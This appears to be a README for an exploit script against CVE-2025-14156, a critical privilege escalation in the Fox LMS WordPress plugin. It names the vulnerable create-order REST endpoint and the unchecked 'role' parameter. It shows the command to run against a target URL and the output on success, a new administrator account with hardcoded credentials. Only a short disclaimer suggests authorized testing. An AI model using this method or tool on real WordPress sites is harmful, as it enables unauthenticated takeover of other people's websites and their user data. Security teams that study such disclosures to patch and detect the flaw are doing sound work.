
Fox LMS – WordPress LMS Plugin 1.0.4.7 - 1.0.5.1 - Unauthenticated Privilege Escalation via 'createOrder'
Fox LMS – WordPress LMS Plugin 1.0.4.7 - 1.0.5.1 - Unauthenticated Privilege Escalation via 'createOrder'
Fox LMS – WordPress LMS Plugin (v1.0.4.7 to v1.0.5.1) – Unauthenticated Privilege Escalation via createOrder
All versions up to and including 1.0.5.1 of Fox LMS for WordPress are vulnerable to privilege escalation. The /fox-lms/v1/payments/create-order REST API endpoint does not properly validate the 'role' parameter when creating new users, allowing unauthenticated attackers to create accounts with arbitrary roles, including Administrator.
CVE: CVE-2025-14156
CVSS Score: 9.8 (Critical)
Risk: Complete site compromise.
CVE-2025-14156.py
python CVE-2025-14156.py -help
usage: CVE-2025-14156.py [-h] -u URL
CVE-2025-14156 Exploit By: Nxploited | Telegram: @Nxploited | Github: Nxploited
options:
-h, --help show this help message and exit
-u, --url URL Target URL (e.g. https://victim.site)
python CVE-2025-14156.py -u https://victim.site
Upon successful exploitation, the script will output only:
[+] Exploit Successful!
Username: nxploited
Password: Nxploited@2025Strong
If exploitation fails, only a concise error message will be shown.
'administrator' role.This tool is for educational and authorized testing purposes only. Any unauthorized use against systems without explicit permission is illegal. The author is not responsible for misuse, damage, or legal consequences resulting from use of this script. Always follow responsible disclosure practices and ensure you have written authorization before testing any target.
Telegram: @Nxploited
Github: Nxploited